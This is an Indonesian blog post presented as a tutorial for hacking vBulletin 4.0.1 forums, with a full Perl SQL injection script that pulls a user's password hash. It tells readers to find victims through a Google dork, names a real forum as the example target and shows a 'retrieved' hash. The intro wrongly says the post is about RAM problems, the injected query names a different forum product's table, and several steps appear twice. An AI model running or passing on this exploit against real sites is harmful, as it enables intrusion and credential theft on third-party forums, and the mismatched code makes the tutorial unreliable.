[POC] Tutorial ini menunjukkan cara hack Forum vBulletin 4.0.1
Hallo Semua Sobat , kali ini Blog's Informatika Cyber akan memposting Mengatasi Masalah pada RAM,
oke tanpa basa basi lagi liat tutorialnya di bawah :
1:- pergi ke Google dan Download Active Perl dan Install
2:- buka NotPad dan Paste kode Code
3: - Dan Save As vb4.pl Jangan lupa untuk memilih Save As Type All Files
4: - maka Pergi Untuk menjalankan Dan Ketik cmd Buka File vb4.pl Anda Dalam Cmd
5: - Dan Masukkan
6: - Dan Lihat File Anda Seperti Ini
7:- sekrang pergi ke Google paste Type dork : " Powered by vBulletin? Version 4.0.1 "
8:- pilih salah satu Forum
9: Example : misal ini http://www.shootfortheedit.com
10: pergi ke Cmd dan type Website
And Enter
[>] SERVER: http://www.shootfortheedit.com
[>] DIR: /forum/
[>] USERID: 1
[+] DONE!
--[ REPORT ]--------------------------------------------------------------------
Password is: 801a2e0624793357acbd5bbd8bf434bf
Semoga Bermanfaat
1:- pergi ke Google dan Download Active Perl dan Install
2:- buka NotPad dan Paste kode Code
Code: |
use IO::Socket; print q{ ################################################## ##################### # vBulletin? Version 4.0.1 Remote SQL Injection Exploit # # By Crash_Override # # our Site www.alboraaq.com # # www.hackingcrackingtricks.blogspot.com # # Indian (th3.g4m3_0v3r@yahoo.com) # # Dork: Powered by vBulletin? Version 4.0.1 # ################################################## ##################### }; if (!$ARGV[2]) { print q{ Usage: perl VB4.0.1.pl host /directory/ victim_userid perl VB4.0.1.pl www.vb.com /forum/ 1 }; } $server = $ARGV[0]; $dir = $ARGV[1]; $user = $ARGV[2]; $myuser = $ARGV[3]; $mypass = $ARGV[4]; $myid = $ARGV[5]; print "------------------------------------------------------------------------------------------------\r\n"; print "[>] SERVER: $server\r\n"; print "[>] DIR: $dir\r\n"; print "[>] USERID: $user\r\n"; print "------------------------------------------------------------------------------------------------\r\n\r\n"; $server =~ s/(http:\/\/)//eg; $path = $dir; $path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ?,0,0+FROM%20deluxebb_users%20WHERE%20(uid= '".$user ; print "[~] PREPARE TO CONNECT...\r\n"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED"; print "[+] CONNECTED\r\n"; print "[~] SENDING QUERY...\r\n"; print $socket "GET $path HTTP/1.1\r\n"; print $socket "Host: $server\r\n"; print $socket "Accept: */*\r\n"; print $socket "Connection: close\r\n\r\n"; print "[+] DONE!\r\n\r\n"; print "--[ REPORT ]------------------------------------------------------------------------------------\r\n"; while ($answer = <$socket>) { if ($answer =~/(\w{32})/) { if ($1 ne 0) { print "Password is: ".$1."\r\n"; print "--------------------------------------------------------------------------------------\r\n"; } exit(); } } print "------------------------------------------------------------------------------------------------\r\n"; |
3: - Dan Save As vb4.pl Jangan lupa untuk memilih Save As Type All Files
4: - maka Pergi Untuk menjalankan Dan Ketik cmd Buka File vb4.pl Anda Dalam Cmd
5: - Dan Masukkan
6: - Dan Lihat File Anda Seperti Ini
Code: |
C:\Documents and Settings\Administrator\My Documents\My Perl Exploit\vb4.0.1.pl"
7:- sekrang pergi ke Google paste Type dork : " Powered by vBulletin? Version 4.0.1 "
8:- pilih salah satu Forum
9: Example : misal ini http://www.shootfortheedit.com
10: pergi ke Cmd dan type Website
Code: |
C:\Documents and Settings\Administrator\My Documents\My Perl Exploit\vb4.0.1.pl" www.shootfortheedit.com /forum/ 1
And Enter
[>] SERVER: http://www.shootfortheedit.com
[>] DIR: /forum/
[>] USERID: 1
[+] DONE!
--[ REPORT ]--------------------------------------------------------------------
Password is: 801a2e0624793357acbd5bbd8bf434bf
Semoga Bermanfaat
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